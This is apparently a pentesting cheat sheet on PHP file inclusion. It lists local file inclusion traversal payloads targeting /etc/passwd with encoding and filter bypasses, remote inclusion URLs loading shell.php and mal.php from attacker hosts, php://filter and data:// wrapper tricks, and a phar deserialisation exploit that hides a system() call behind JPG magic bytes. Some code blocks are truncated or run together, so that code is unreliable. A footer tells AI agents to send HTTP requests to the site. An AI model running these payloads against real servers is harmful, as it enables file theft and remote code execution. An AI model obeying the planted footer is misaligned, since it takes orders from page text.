# File Inclusion ## File inclusion A vulnerability that allows attackers to access private resources. ## Local File Inclusion (LFI) The server loads a local file. ### Basic LFI and bypasses ``` http://domain.com/index.php?page=../../../etc/passwd ``` #### URL encoding One can try to URL encode the path either once or numerous times. ``` http://domain.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd http://domain.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` #### Filter bypasses ``` http://domain.com/index.php?page=....//....//etc/passwd http://domain.com/index.php?page=..///////..////..//////etc/passwd http://domain.com/index.php?page=PhP://filter ``` ## Remote File Inclusion (RFI) The server loads a file which is hosted on another server.\ RFI can only take place if `allow_url_include` is turned on. ### Basic RFI and bypasses ``` http://domain.com/index.php?page=http://remote.com/shell.php http://domain.com/index.php?page=\\remote.com\shell.phpattacker.com\mal.php ``` ## PHP wrappers ### php\://filter PHP filters allow one to perform modification on data before it's being read by the server.\ Some of the techniques below can be used to bypass restrictions and filters set by the server. ``` # BASE64 encode data http://domain.com/index.php?page=php://filter/convert.base64-decode/resource=/etc/passwd); ``` #### data:// ``` http://domain.com/?page=data://text/plain, http://domain.com/?page=data://text/plain, ``` ### phar:// and phar deserialisation A `.phar` file is a PHP archive. One can upload such file and execute code when it is being loaded.\ It contains metadata in a serialised format. When parsed on the server said metadata gets deserialised. Even if the source code on the server is not using the `eval` function, the following other methods will still invoke the vulnerability. `file_get_contents()`,`fopen()`,`file()`,`file_exists()`,`md5_file()`,`filemtime()`,`filesize()` * [More detail](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization) #### Exploitation 1. Pretend that this is the source code of the server. ```php # server.php data = $data; } function __destruct() { system($this->data); } } file_get_contents("phar://pwned.phar"); ?> ``` 2. This is the code that will make the phar file. ```php # make_phar.php data = $data; } function __destruct() { system($this->data); } } # Make phar $phar = new Phar('pwned.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub("\xff\xd8\xff\n"); # Add object of class as metadata $object = new ReadFile('whoami'); $phar->setMetadata($object); $phar->stopBuffering(); ?> ``` *Magic bytes of JPG* `\xff\xd8\xff` *have been added to the phar file to bypass file upload restrictions* 3. Compile `pwned.phar` with: ```bash php --define phar.readonly=0 make_phar.php ``` ## References * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://security-vault.gitbook.io/hacking-methodology/reconnaissance/attacks/file_inclusion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.